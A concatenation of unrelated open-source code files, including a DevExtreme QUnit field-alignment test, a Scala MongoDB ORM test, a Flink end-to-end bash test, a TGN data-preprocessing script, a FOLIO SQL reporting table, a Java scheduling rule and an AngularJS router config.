<div class="dx-field-label" data-bind="text: \'Autocomplete: \'"></div> \
<div class="dx-field-value" data-bind="dxAutocomplete: {}"></div> \
</div> \
<div class="dx-field" id="textareaOnField"> \
<div class="dx-field-label" data-bind="text: \'TextArea: \'"></div> \
<div class="dx-field-value" data-bind="dxTextArea: {}"></div> \
</div> \
<div class="dx-field" id="lookupOnField"> \
<div class="dx-field-label" data-bind="text: \'Lookup: \'"></div> \
<div class="dx-field-value" data-bind="dxLookup: {}"></div> \
</div> \
<div class="dx-field" id="sliderOnField"> \
<div class="dx-field-label" data-bind="text: \'Slider: \'"></div> \
<div class="dx-field-value" data-bind="dxSlider: {}"></div> \
</div> \
<div class="dx-field" id="dateboxOnField"> \
<div class="dx-field-label" data-bind="text: \'DateBox: \'"></div> \
<div class="dx-field-value" data-bind="dxDateBox: { useCalendar: false }"></div> \
</div> \
<div class="dx-field" id="numberboxOnField"> \
<div class="dx-field-label" data-bind="text: \'dxNumberBox: \'"></div> \
<div class="dx-field-value" data-bind="dxNumberBox: {}"></div> \
</div> \
<div class="dx-field" id="simpleTextOnField"> \
<div class="dx-field-label" data-bind="text: \'Simple text: \'"></div> \
<div class="dx-field-value dx-field-value-static" data-bind="text: \'Simple text\'"></div> \
</div> \
</div> \
<div class="dx-fieldset" id="widgetsInFields"> \
<div class="dx-field" id="switchInField"> \
<div class="dx-field-label" data-bind="text: \'Switch:\'"></div> \
<div class="dx-field-value"> \
<div data-bind="dxSwitch: {}"></div> \
</div> \
</div> \
<div class="dx-field" id="checkboxInField"> \
<div class="dx-field-label" data-bind="text: \'CheckBox:\'"></div> \
<div class="dx-field-value"> \
<div data-bind="dxCheckBox: {}"></div> \
</div> \
</div> \
<div class="dx-field" id="textboxInField"> \
<div class="dx-field-label" data-bind="text: \'TextBox: \'"></div> \
<div class="dx-field-value"> \
<div data-bind="dxTextBox: {}"></div> \
</div> \
</div> \
<div class="dx-field" id="autocompleteInField"> \
<div class="dx-field-label" data-bind="text: \'Autocomplete: \'"></div> \
<div class="dx-field-value"> \
<div data-bind="dxAutocomplete: {}"></div> \
</div> \
</div> \
<div class="dx-field" id="textareaInField"> \
<div class="dx-field-label" data-bind="text: \'TextArea: \'"></div> \
<div class="dx-field-value"> \
<div data-bind="dxTextArea: {}"></div> \
</div> \
</div> \
<div class="dx-field" id="lookupInField"> \
<div class="dx-field-label" data-bind="text: \'Lookup: \'"></div> \
<div class="dx-field-value"> \
<div data-bind="dxLookup: {}"></div> \
</div> \
</div> \
<div class="dx-field" id="sliderInField"> \
<div class="dx-field-label" data-bind="text: \'Slider: \'"></div> \
<div class="dx-field-value"> \
<div data-bind="dxSlider: {}"></div> \
</div> \
</div> \
<div class="dx-field" id="dateboxInField"> \
<div class="dx-field-label" data-bind="text: \'DateBox: \'"></div> \
<div class="dx-field-value"> \
<div data-bind="dxDateBox: { useCalendar: false }"></div> \
</div> \
</div> \
<div class="dx-field" id="numberboxInField"> \
<div class="dx-field-label" data-bind="text: \'dxNumberBox: \'"></div> \
<div class="dx-field-value"> \
<div data-bind="dxNumberBox: {}"></div> \
</div> \
</div> \
<div class="dx-field" id="simpleTextInField"> \
<div class="dx-field-label" data-bind="text: \'Simple text: \'"></div> \
<div class="dx-field-value dx-field-value-static"> \
Simple text \
</div> \
</div> \
</div> \
</div>';
var checkThatTestingIsPossible = function() {
if(browser.mozilla) {
QUnit.test("Temporarily we do not test for firefox", function(assert) {
assert.ok(true);
});
return false;
}
if(!browser.webkit) {
QUnit.test("Temporarily we do not test for non-webkit browsers", function(assert) {
assert.ok(true);
});
return false;
}
var realDevice = devices.real();
if(realDevice.platform === "android" || realDevice.platform === "ios") {
QUnit.test("Temporarily we do not test on mobile devices", function(assert) {
assert.ok(true);
});
return false;
}
return true;
};
var defaultOptions = {
numberBoxAlign: "right",
testVerticalOffset: true,
testSwitchBaseline: true,
testDateBox: true
};
var getFullOffsetLeft = function($element) {
return Math.round($element.offset().left +
parseFloat($element.css("padding-left")) +
parseFloat($element.css("border-left-width")));
};
var getFullOffsetRight = function($element) {
return Math.round($element.offset().left +
$element.innerWidth());
};
var testVerticalAlign = function($parent, inputSelector, isContainer, testVerticalOffsetFlag) {
var $label = $parent.find(LABEL),
$value = $parent.find(inputSelector);
if(testVerticalOffsetFlag) {
testVerticalOffset($label, $value);
}
var $valueContainer = isContainer ? $value : $value.parent();
testBaselineOffset($label, $valueContainer);
};
var testVerticalOffset = function($label, $value) {
var isIE9 = document.all && !document.atob;
var labelOffset = Math.round($label.offset().top - parseInt($label.css("margin-top")) - isIE9 ? parseInt($label.css("borderTopWidth")) : 0),
valueOffset = Math.round($value.offset().top - parseInt($value.css("margin-top")) - isIE9 ? parseInt($value.css("borderTopWidth")) : 0);
QUnit.assert.equal(labelOffset, valueOffset, "Top offset equal");
};
var testBaselineOffset = function($labelContainer, $valueContainer) {
var $imgForLabel,
$imgForInput;
try {
$imgForLabel = $("<img/>").height(1).width(1).appendTo($labelContainer);
$imgForInput = $("<img/>").height(1).width(1).appendTo($valueContainer);
$imgForLabel.closest(".dx-field-label").css("whiteSpace", "nowrap");
$imgForInput.closest(".dx-field-value").css("whiteSpace", "nowrap");
QUnit.assert.roughEqual($imgForLabel.offset().top, $imgForInput.offset().top, 0.99);
} finally {
$imgForLabel.remove();
$imgForInput.remove();
}
};
module.exports = function(themeName, options) {
if(!checkThatTestingIsPossible()) {
return;
}
options = options || {};
options = $.extend({}, defaultOptions, options);
var runTestModule = function(themeName) {
QUnit.module(themeName, {
beforeEach: function() {
DevExpress.testing.executeAsyncMock.setup();
$("#qunit-fixture").html(fieldsetFixtureTemplate);
var $markup = $("#markup");
ko.applyBindings({}, $markup.get(0));
},
afterEach: function() {
$("#qunit-fixture").empty();
DevExpress.testing.executeAsyncMock.teardown();
}
});
QUnit.test("Horizontal align for same widgets on and in field-value", function(assert) {
var offsetRightForSwitchOnField = getFullOffsetRight($("#switchOnField " + VALUE + " .dx-switch-wrapper")),
offsetRightForSwitchInField = getFullOffsetRight($("#switchInField " + VALUE + " .dx-switch-wrapper")),
offsetRightForCheckboxOnField = getFullOffsetRight($("#checkboxOnField " + VALUE + " .dx-checkbox-icon")),
offsetRightForCheckboxInField = getFullOffsetRight($("#checkboxInField " + VALUE + " .dx-checkbox-icon")),
offsetLeftForSliderOnField = getFullOffsetLeft($("#sliderOnField " + VALUE + " .dx-slider-wrapper")),
offsetLeftForSliderInField = getFullOffsetLeft($("#sliderInField " + VALUE + " .dx-slider-wrapper")),
offsetLeftForTextBoxOnField = getFullOffsetLeft($("#textboxOnField " + VALUE + " input")),
offsetLeftForTextBoxInField = getFullOffsetLeft($("#textboxInField " + VALUE + " input")),
offsetLeftForAutocompleteOnField = getFullOffsetLeft($("#autocompleteOnField " + VALUE + " input.dx-texteditor-input")),
offsetLeftForAutocompleteInField = getFullOffsetLeft($("#autocompleteInField " + VALUE + " input.dx-texteditor-input")),
offsetLeftForDateBoxOnField = getFullOffsetLeft($("#dateboxOnField " + VALUE + " input")),
offsetLeftForDateBoxInField = getFullOffsetLeft($("#dateboxInField " + VALUE + " input")),
offsetLeftForTextAreaOnField = getFullOffsetLeft($("#textareaOnField " + VALUE + " textarea")),
offsetLeftForTextAreaInField = getFullOffsetLeft($("#textareaInField " + VALUE + " textarea")),
offsetLeftForLookupOnField = getFullOffsetLeft($("#lookupOnField " + VALUE + " .dx-lookup-field")),
offsetLeftForLookupInField = getFullOffsetLeft($("#lookupInField " + VALUE + " .dx-lookup-field")),
offsetLeftForSimpleOnField = getFullOffsetLeft($("#simpleTextOnField " + VALUE)),
offsetLeftForSimpleInField = getFullOffsetLeft($("#simpleTextInField " + VALUE)),
offsetRightForNumberBoxOnField = getFullOffsetRight($("#numberboxOnField " + VALUE + " input")),
offsetRightForNumberBoxInField = getFullOffsetRight($("#numberboxInField " + VALUE + " input")),
offsetLeftForNumberBoxOnField = getFullOffsetLeft($("#numberboxOnField " + VALUE + " input")),
offsetLeftForNumberBoxInField = getFullOffsetLeft($("#numberboxInField " + VALUE + " input"));
assert.equal(offsetRightForSwitchOnField, offsetRightForSwitchInField, "Horizontal align for switches");
assert.equal(offsetRightForCheckboxOnField, offsetRightForCheckboxInField, "Horizontal align for checkboxes");
assert.equal(offsetLeftForSliderOnField, offsetLeftForSliderInField, "Horizontal align for sliders");
assert.equal(offsetLeftForTextBoxOnField, offsetLeftForTextBoxInField, "Horizontal align for textboxes");
assert.equal(offsetLeftForAutocompleteOnField, offsetLeftForAutocompleteInField, "Horizontal align for autocompletes");
if(options.testDateBox) {
assert.equal(offsetLeftForDateBoxOnField, offsetLeftForDateBoxInField, "Horizontal align for dateboxes");
}
assert.equal(offsetLeftForTextAreaOnField, offsetLeftForTextAreaInField, "Horizontal align for textareas");
assert.equal(offsetLeftForLookupOnField, offsetLeftForLookupInField, "Horizontal align for lookups");
assert.equal(offsetLeftForSimpleOnField, offsetLeftForSimpleInField, "Horizontal align for simples");
if(options.numberBoxAlign === "right") {
assert.equal(offsetRightForNumberBoxOnField, offsetRightForNumberBoxInField, "Horizontal align for numberboxes");
} else if(options.numberBoxAlign === "left") {
assert.equal(offsetLeftForNumberBoxOnField, offsetLeftForNumberBoxInField, "Horizontal align for numberboxes");
}
});
QUnit.test("Horizontal align for different widgets on field-value", function(assert) {
var offsetLeftForTextBoxOnField = getFullOffsetLeft($("#textboxOnField " + VALUE + " input")),
offsetLeftForAutocompleteOnField = getFullOffsetLeft($("#autocompleteOnField " + VALUE + " input.dx-texteditor-input")),
offsetLeftForDateBoxOnField = getFullOffsetLeft($("#dateboxOnField " + VALUE + " input.dx-texteditor-input")),
offsetLeftForTextAreaOnField = getFullOffsetLeft($("#textareaOnField " + VALUE + " textarea")),
offsetLeftForLookupOnField = getFullOffsetLeft($("#lookupOnField " + VALUE + " .dx-lookup-field")),
offsetLeftForSimpleOnField = getFullOffsetLeft($("#simpleTextOnField " + VALUE)),
currentTheme = themes.current(),
paddingTextAreaDifference = currentTheme === "ios.default" || currentTheme === "ios7.default" ? 3 : 0;
assert.equal(offsetLeftForTextBoxOnField, offsetLeftForAutocompleteOnField, "Horizontal align for textbox and autocomplete");
if(options.testDateBox) {
assert.equal(offsetLeftForAutocompleteOnField, offsetLeftForDateBoxOnField, "Horizontal align for autocomplete and datebox");
} else {
offsetLeftForDateBoxOnField = offsetLeftForAutocompleteOnField;
}
assert.equal(offsetLeftForDateBoxOnField, offsetLeftForTextAreaOnField + paddingTextAreaDifference, "Horizontal align for datebox and textarea");
assert.equal(offsetLeftForTextAreaOnField + paddingTextAreaDifference, offsetLeftForLookupOnField, "Horizontal align for textarea and lookup");
assert.equal(offsetLeftForLookupOnField, offsetLeftForSimpleOnField, "Horizontal align for lookup and simpletext");
});
QUnit.test("Equal width for same widgets on and in field-value", function(assert) {
var widthForSwitchOnField = $("#switchOnField " + VALUE + " .dx-switch-wrapper").width(),
widthForSwitchInField = $("#switchInField " + VALUE + " .dx-switch-wrapper").width(),
widthForCheckboxOnField = $("#checkboxOnField " + VALUE + " .dx-checkbox-icon").width(),
widthForCheckboxInField = $("#checkboxInField " + VALUE + " .dx-checkbox-icon").width(),
widthForSliderOnField = $("#sliderOnField " + VALUE + " .dx-slider-wrapper").width(),
widthForSliderInField = $("#sliderInField " + VALUE + " .dx-slider-wrapper").width(),
widthForTextBoxOnField = $("#textboxOnField " + VALUE + " input").width(),
widthForTextBoxInField = $("#textboxInField " + VALUE + " input").width(),
widthForAutocompleteOnField = $("#autocompleteOnField " + VALUE + " input.dx-texteditor-input").width(),
widthForAutocompleteInField = $("#autocompleteInField " + VALUE + " input.dx-texteditor-input").width(),
widthForDateBoxOnField = $("#dateboxOnField " + VALUE + " input.dx-texteditor-input").width(),
widthForDateBoxInField = $("#dateboxInField " + VALUE + " input.dx-texteditor-input").width(),
widthForTextAreaOnField = $("#textareaOnField " + VALUE + " textarea").width(),
widthForTextAreaInField = $("#textareaInField " + VALUE + " textarea").width(),
widthForLookupOnField = $("#lookupOnField " + VALUE + " .dx-lookup-field").width(),
widthForLookupInField = $("#lookupInField " + VALUE + " .dx-lookup-field").width(),
widthForSimpleOnField = $("#simpleTextOnField " + VALUE).width(),
widthForSimpleInField = $("#simpleTextInField " + VALUE).width(),
widthForNumberBoxOnField = $("#numberboxOnField " + VALUE + " input").width(),
widthForNumberBoxInField = $("#numberboxInField " + VALUE + " input").width();
assert.equal(widthForSwitchOnField, widthForSwitchInField, "Width for switches");
assert.equal(widthForCheckboxOnField, widthForCheckboxInField, "Width for checkboxes");
assert.equal(widthForSliderOnField, widthForSliderInField, "Width for sliders");
assert.equal(widthForTextBoxOnField, widthForTextBoxInField, "Width for textboxes");
assert.equal(widthForAutocompleteOnField, widthForAutocompleteInField, "Width for autocompletes");
assert.equal(widthForDateBoxOnField, widthForDateBoxInField, "Width for dateboxes");
assert.equal(widthForTextAreaOnField, widthForTextAreaInField, "Width for textarea");
assert.equal(widthForLookupOnField, widthForLookupInField, "Width for lookups");
assert.equal(widthForSimpleOnField, widthForSimpleInField, "Width for simples");
assert.equal(widthForNumberBoxOnField, widthForNumberBoxInField, "Width for numberboxes");
});
QUnit.test("dxSwitch on Field", function(assert) {
if(options.testSwitchBaseline) {
testBaselineOffset($("#switchOnField " + LABEL), $("#switchOnField").find(VALUE + " .dx-switch-off"), true);
} else {
assert.ok(true);
}
});
QUnit.test("dxSwitch in Field", function(assert) {
if(options.testSwitchBaseline) {
testBaselineOffset($("#switchInField " + LABEL), $("#switchInField").find(VALUE + " .dx-switch-off"), true);
} else {
assert.ok(true);
}
});
QUnit.test("dxTextbox on Field", function(assert) {
testVerticalAlign($("#textboxOnField"), VALUE + " input", false, options.testVerticalOffset);
});
QUnit.test("dxTextbox in Field", function(assert) {
testVerticalAlign($("#textboxInField"), VALUE + " input", false, options.testVerticalOffset);
});
QUnit.test("dxAutocomplete on Field", function(assert) {
testVerticalAlign($("#autocompleteOnField"), VALUE + " input.dx-texteditor-input", false, options.testVerticalOffset);
});
QUnit.test("dxAutocomplete in Field", function(assert) {
testVerticalAlign($("#autocompleteInField"), VALUE + " input.dx-texteditor-input", false, options.testVerticalOffset);
});
QUnit.test("dxLookup on Field", function(assert) {
testVerticalAlign($("#lookupOnField"), VALUE + " .dx-lookup-field", true, options.testVerticalOffset);
});
QUnit.test("dxLookup in Field", function(assert) {
testVerticalAlign($("#lookupInField"), VALUE + " .dx-lookup-field", true, options.testVerticalOffset);
});
QUnit.test("simpleText on Field", function(assert) {
testVerticalAlign($("#simpleTextOnField"), VALUE, true, options.testVerticalOffset);
});
QUnit.test("simpleText in Field", function(assert) {
testVerticalAlign($("#simpleTextInField"), VALUE, true, options.testVerticalOffset);
});
QUnit.test("dxNumberbox on Field", function(assert) {
testVerticalAlign($("#numberboxOnField"), VALUE + " input.dx-texteditor-input", false, options.testVerticalOffset);
});
QUnit.test("dxNumberbox in Field", function(assert) {
testVerticalAlign($("#numberboxInField"), VALUE + " input.dx-texteditor-input", false, options.testVerticalOffset);
});
QUnit.test("dxTextarea on Field", function(assert) {
var $parent = $("#textareaOnField"),
$label = $parent.find(LABEL),
$valueInput = $parent.find(VALUE + " textarea");
if(options.verticalOffsetTest) {
testVerticalOffset($label, $valueInput);
}
var cloneTextArea = $("<div>").css("display", "inline-block")
.css("vertical-align", "top")
.css("padding-top", $valueInput.css("padding-top"))
.css("paddingBottom", $valueInput.css("paddingBottom"))
.css("margin-top", $valueInput.css("margin-top"))
.css("marginBottom", $valueInput.css("marginBottom"))
.css("borderTopWidth", $valueInput.css("borderTopWidth"))
.css("borderBottomWidth", $valueInput.css("borderBottomWidth"))
.css("border-top-style", $valueInput.css("border-top-style"))
.css("border-bottom-style", $valueInput.css("border-bottom-style"))
.prependTo($valueInput.parent());
testBaselineOffset($label, cloneTextArea);
});
QUnit.test("dxTextarea in Field", function(assert) {
var $parent = $("#textareaInField"),
$label = $parent.find(LABEL),
$valueInput = $parent.find(VALUE + " textarea");
if(options.verticalOffsetTest) {
testVerticalOffset($label, $valueInput);
}
var cloneTextArea = $("<div>").css("display", "inline-block")
.css("vertical-align", "top")
.css("padding-top", $valueInput.css("padding-top"))
.css("paddingBottom", $valueInput.css("paddingBottom"))
.css("margin-top", $valueInput.css("margin-top"))
.css("marginBottom", $valueInput.css("marginBottom"))
.css("borderTopWidth", $valueInput.css("borderTopWidth"))
.css("borderBottomWidth", $valueInput.css("borderBottomWidth"))
.css("border-top-style", $valueInput.css("border-top-style"))
.css("border-bottom-style", $valueInput.css("border-bottom-style"))
.prependTo($valueInput.parent());
testBaselineOffset($label, cloneTextArea);
});
};
runTestModule();
};
|
<filename>rogue/core/src/test/scala/TrivialORMAsyncQueryTest.scala
package tech.scoundrel.rogue.test
import com.mongodb._
import com.mongodb.async.client
import com.mongodb.async.client._
import tech.scoundrel.rogue.MongoHelpers.{ AndCondition, MongoSelect }
import tech.scoundrel.rogue.test.TrivialORM.{ Meta, Record }
import tech.scoundrel.rogue.RogueWriteSerializer
import org.bson.Document
import org.junit.{ Before, Test }
import org.specs2.matcher.JUnitMustMatchers
import scala.concurrent.Await
import scala.concurrent.ExecutionContext.Implicits.global
import scala.concurrent.duration._
import tech.scoundrel.rogue._
import tech.scoundrel.rogue.index.UntypedMongoIndex
object TrivialAsyncORMTests {
def connectToMongo: client.MongoClient = {
val (host, port) = Option(System.getProperty("default.mongodb.server")).map({ str =>
val arr = str.split(':')
(arr(0), arr(1).toInt)
}).getOrElse(("localhost", 51101))
//val opts = MongoClientOptions.builder().codecRegistry(TrivialSyncORM.codecRegistry).build()
MongoClients.create(s"mongodb://${host}:${port}")
}
lazy val mongoAsync: async.client.MongoClient = {
connectToMongo
}
def disconnectFromMongo = {
mongoAsync.close
}
type MB = Meta[_]
class MyDBCollectionFactory(dba: MongoDatabase) extends AsyncDBCollectionFactory[MB, Record] {
val db = dba.withCodecRegistry(com.mongodb.MongoClient.getDefaultCodecRegistry)
override def getDBCollection[M <: MB](query: Query[M, _, _]): MongoCollection[Document] = {
db.getCollection(query.meta.collectionName)
}
override def getPrimaryDBCollection[M <: MB](query: Query[M, _, _]): MongoCollection[Document] = {
db.getCollection(query.meta.collectionName)
}
override def getInstanceName[M <: MB](query: Query[M, _, _]): String = {
db.getName
}
override def getIndexes[M <: MB](query: Query[M, _, _]): Option[List[UntypedMongoIndex]] = {
None
}
override def getPrimaryDBCollection(record: Record): MongoCollection[Document] = ???
override def getInstanceName(record: Record): String = ???
}
class MyQueryExecutor extends AsyncQueryExecutor[Meta[_], Record] {
override val adapter = new MongoAsyncJavaDriverAdapter[Meta[_], Record](new MyDBCollectionFactory(mongoAsync.getDatabase("testAsync")))
override val optimizer = new QueryOptimizer
override val defaultWriteConcern: WriteConcern = WriteConcern.ACKNOWLEDGED
/*
protected def readSerializer[M <: MB, R](
meta: M,
select: Option[MongoSelect[M, R]]
): RogueReadSerializer[R]
protected def writeSerializer(record: RB): RogueWriteSerializer[RB]
*/
override protected def readSerializer[M <: Meta[_], R](
meta: M,
select: Option[MongoSelect[M, R]]
): RogueReadSerializer[R] = new RogueReadSerializer[R] {
override def fromDBObject(dbo: DBObject): R = select match {
case Some(MongoSelect(fields, transformer, true, _)) if fields.isEmpty =>
// A MongoSelect clause exists, but has empty fields. Return null.
// This is used for .exists(), where we just want to check the number
// of returned results is > 0.
transformer(null)
case Some(MongoSelect(fields, transformer, _, _)) =>
transformer(fields.map(f => f.valueOrDefault(Option(dbo.get(f.field.name)))))
case None =>
meta.fromDBObject(dbo).asInstanceOf[R]
}
override def fromDocument(doc: Document): R = select match {
case Some(MongoSelect(fields, transformer, true, _)) if fields.isEmpty =>
// A MongoSelect clause exists, but has empty fields. Return null.
// This is used for .exists(), where we just want to check the number
// of returned results is > 0.
transformer(null)
case Some(MongoSelect(fields, transformer, _, _)) =>
transformer(fields.map(f => f.valueOrDefault(Option(doc.get(f.field.name)))))
case None =>
meta.fromDocument(doc).asInstanceOf[R]
}
}
override protected def writeSerializer(record: Record): RogueWriteSerializer[Record] = new RogueWriteSerializer[Record] {
override def toDBObject(record: Record): DBObject = {
???
///record.meta.toDBObject(record)
}
override def toDocument(r: Record): Document = {
???
//record.meta.toDocument(r)
}
}
}
object Implicits extends Rogue {
implicit def meta2Query[M <: Meta[R], R](meta: M with Meta[R]): Query[M, R, InitialState] = {
Query[M, R, InitialState](
meta, meta.collectionName, None, None, None, None, None, AndCondition(Nil, None, None), None, None, None
)
}
}
}
// TODO(nsanch): Everything in the rogue-lift tests should move here, except for the lift-specific extensions.
class TrivialAsyncORMQueryTest extends JUnitMustMatchers {
val executor = new TrivialAsyncORMTests.MyQueryExecutor
val oneS = 1 second
import TrivialAsyncORMTests.Implicits._
@Before
def cleanUpMongo = {
Await.ready(executor.bulkDelete_!!(SimpleRecord), oneS)
()
}
@Test
def canBuildQuery: Unit = {
(SimpleRecord: Query[SimpleRecord.type, SimpleRecord, InitialState]).toString() must_== """db.simple_records.find({ })"""
SimpleRecord.where(_.a eqs 1).toString() must_== """db.simple_records.find({ "a" : 1})"""
}
@Test
def canExecuteQuery: Unit = {
Await.result(executor.fetch(SimpleRecord.where(_.a eqs 1)), oneS) must_== Nil
Await.result(executor.count(SimpleRecord), oneS) must_== 0
Await.result(executor.exists(SimpleRecord), oneS) must_== false
}
@Test
def canUpsertAndGetResults: Unit = {
Await.result(executor.count(SimpleRecord), oneS) must_== 0
val x = for {
_ <- executor.upsertOne(SimpleRecord.modify(_.a setTo 1).and(_.b setTo "foo"))
cnt <- executor.count(SimpleRecord)
results <- executor.fetch(SimpleRecord.where(_.a eqs 1))
e1 <- executor.exists(SimpleRecord.where(_.a eqs 1).select(_.a))
r1 <- executor.fetch(SimpleRecord.where(_.a eqs 1).select(_.a))
r2 <- executor.fetch(SimpleRecord.where(_.a eqs 1).select(_.b))
r3 <- executor.fetch(SimpleRecord.where(_.a eqs 1).select(_.a, _.b))
} yield {
e1 must_== true
cnt must_== 1
results.size must_== 1
results(0).a must_== 1
results(0).b must_== "foo"
r1 must_== List(Some(1))
r2 must_== List(Some("foo"))
r3 must_== List((Some(1), Some("foo")))
}
Await.ready(x, 10 seconds)
}
}
|
#!/usr/bin/env bash
################################################################################
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
################################################################################
source "$(dirname "$0")"/common.sh
TEST_PROGRAM_JAR=$TEST_INFRA_DIR/../../flink-end-to-end-tests/flink-stream-sql-test/target/StreamSQLTestProgram.jar
# copy flink-table jar into lib folder
cp $FLINK_DIR/opt/flink-table*jar $FLINK_DIR/lib
start_cluster
$FLINK_DIR/bin/taskmanager.sh start
$FLINK_DIR/bin/taskmanager.sh start
$FLINK_DIR/bin/taskmanager.sh start
$FLINK_DIR/bin/flink run -p 4 $TEST_PROGRAM_JAR -outputPath $TEST_DATA_DIR/out/result
function sql_cleanup() {
stop_cluster
$FLINK_DIR/bin/taskmanager.sh stop-all
# remove flink-table from lib folder
rm $FLINK_DIR/lib/flink-table*jar
# make sure to run regular cleanup as well
cleanup
}
trap sql_cleanup INT
trap sql_cleanup EXIT
# collect results from files
cat $TEST_DATA_DIR/out/result/part-0-0 $TEST_DATA_DIR/out/result/_part-0-1.pending > $TEST_DATA_DIR/out/result-complete
# check result:
# 20,1970-01-01 00:00:00.0
# 20,1970-01-01 00:00:20.0
# 20,1970-01-01 00:00:40.0
check_result_hash "StreamSQL" $TEST_DATA_DIR/out/result-complete "b29f14ed221a936211202ff65b51ee26"
|
<gh_stars>1-10
_all__ = ["crypto_utils","myCrypto","myParser","senz_parser"] |
import json
import numpy as np
import pandas as pd
from pathlib import Path
import argparse
import logging
import time
from sklearn.preprocessing import MinMaxScaler
def preprocess(data_name):
logger.info("Loading interaction and label data...")
u_list, i_list, ts_list, label_list = [], [], [], []
feat_l = []
idx_list = []
with open(data_name) as f:
s = next(f)
for idx, line in enumerate(f):
e = line.strip().split(',')
u = int(e[0])
i = int(e[1])
ts = float(e[2])
label = float(e[3]) # int(e[3])
feat = np.array([float(x) for x in e[4:]])
u_list.append(u)
i_list.append(i)
ts_list.append(ts)
label_list.append(label)
idx_list.append(idx)
feat_l.append(feat)
logger.info("Loading interation and label data succeeded.")
return pd.DataFrame({'u': u_list,
'i': i_list,
'ts': ts_list,
'label': label_list,
'idx': idx_list}), np.array(feat_l)
def reindex(df, bipartite=True):
new_df = df.copy()
if bipartite:
assert (df.u.max() - df.u.min() + 1 == len(df.u.unique()))
assert (df.i.max() - df.i.min() + 1 == len(df.i.unique()))
upper_u = df.u.max() + 1
new_i = df.i + upper_u
new_df.i = new_i
new_df.u += 1
new_df.i += 1
new_df.idx += 1
else:
new_df.u += 1
new_df.i += 1
new_df.idx += 1
return new_df
def run(data_name, bipartite=True):
Path("data/").mkdir(parents=True, exist_ok=True)
PATH = './data/{}_node_interactions.csv'.format(data_name)
PATH_NODE_FEAT = './data/{}_node_features.csv'.format(data_name)
OUT_DF = './data/ml_{}.csv'.format(data_name)
OUT_FEAT = './data/ml_{}.npy'.format(data_name)
OUT_NODE_FEAT = './data/ml_{}_node.npy'.format(data_name)
df, feat = preprocess(PATH)
new_df = reindex(df, bipartite)
empty = np.zeros(feat.shape[1])[np.newaxis, :]
feat = np.vstack([empty, feat])
# %%
max_idx = max(new_df.u.max(), new_df.i.max())
try:
logger.info("Trying to load graph node features...")
node_feat = pd.read_csv(PATH_NODE_FEAT)
node_feat = pd.DataFrame(MinMaxScaler().fit_transform(node_feat.values), columns=node_feat.columns, index=node_feat.index).to_numpy()
# the indices of the entities start at 1, so we need one more element for the non-existent 0 element (i.e. ml_reddit_df["u"].min() == 1)
node_feat = np.vstack([np.zeros([max_idx + 1 - node_feat.shape[0], node_feat.shape[1]]), node_feat])
logger.info("Loading node features succeeded.")
except Exception as e:
logger.info("Loading node features failed, loading zero matrix instead...")
logger.info(str(e))
node_feat = np.zeros((max_idx + 1, 172))
# %%
new_df.to_csv(OUT_DF)
np.save(OUT_FEAT, feat)
np.save(OUT_NODE_FEAT, node_feat)
if __name__ == "__main__":
parser = argparse.ArgumentParser('Interface for TGN data preprocessing')
parser.add_argument('--data', type=str, help='Dataset name (eg. wikipedia or reddit or your own)',
default='wikipedia')
parser.add_argument('--bipartite', action='store_true', help='Whether the graph is bipartite')
args = parser.parse_args()
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
fh = logging.FileHandler('log/{}.log'.format(str(time.time())))
fh.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.WARN)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
fh.setFormatter(formatter)
ch.setFormatter(formatter)
logger.addHandler(fh)
logger.addHandler(ch)
logger.info(args)
logger.info(f"Preprocessing {args.data}...")
run(args.data, bipartite=args.bipartite)
logger.info(f"Preprocessing {args.data} data succeeded.") |
<reponame>VandanaShah-Cornell/folio-analytics<gh_stars>1-10
DROP TABLE IF EXISTS folio_reporting.item_electronic_access;
-- Create table for electronic access points for item records. This includes the name of the relationship and the id.
CREATE TABLE folio_reporting.item_electronic_access AS
SELECT
item.id AS item_id,
item.hrid AS item_hrid,
json_extract_path_text(electronic_access.data, 'linkText') AS link_text,
json_extract_path_text(electronic_access.data, 'materialsSpecification') AS materials_specification,
json_extract_path_text(electronic_access.data, 'publicNote') AS public_note,
json_extract_path_text(electronic_access.data, 'relationshipId') AS relationship_id,
inventory_electronic_access_relationships.name AS relationship_name,
json_extract_path_text(electronic_access.data, 'uri') AS uri
FROM
inventory_items AS item
CROSS JOIN json_array_elements(json_extract_path(data, 'electronicAccess')) AS electronic_access(data)
LEFT JOIN inventory_electronic_access_relationships ON json_extract_path_text(electronic_access.data, 'relationshipId') = inventory_electronic_access_relationships.id;
CREATE INDEX ON folio_reporting.item_electronic_access (item_id);
CREATE INDEX ON folio_reporting.item_electronic_access (item_hrid);
CREATE INDEX ON folio_reporting.item_electronic_access (link_text);
CREATE INDEX ON folio_reporting.item_electronic_access (materials_specification);
CREATE INDEX ON folio_reporting.item_electronic_access (public_note);
CREATE INDEX ON folio_reporting.item_electronic_access (relationship_id);
CREATE INDEX ON folio_reporting.item_electronic_access (relationship_name);
CREATE INDEX ON folio_reporting.item_electronic_access (uri);
|
package yimei.jss.rule.operation.basic;
import ec.rule.Rule;
import yimei.jss.jobshop.OperationOption;
import yimei.jss.jobshop.WorkCenter;
import yimei.jss.rule.AbstractRule;
import yimei.jss.rule.RuleType;
import yimei.jss.simulation.state.SystemState;
/**
* Created by YiMei on 27/09/16.
*/
public class EDD extends AbstractRule {
public EDD(RuleType type) {
name = "\"EDD\"";
this.type = type;
}
@Override
public double priority(OperationOption op, WorkCenter workCenter, SystemState systemState) {
return op.getJob().getDueDate();
}
}
|
angular
.module('app', ['ngSanitize', 'ui.router', 'templates', 'ngResource', 'ui.bootstrap'])
.config(['$stateProvider', '$urlRouterProvider',function($stateProvider, $urlRouterProvider) {
$stateProvider
.state('home', {
url: '/',
templateUrl:'home.html',
controller: 'HomeController as vm',
resolve: {
recipeShowObject: function () {
return {};
}
}
})
.state('home.ingredients', {
url: 'ingredients',
templateUrl: 'ingredients.html',
controller: 'IngredientsController as vm',
resolve: {
recipeShowObject: function () {
return {};
}
}
})
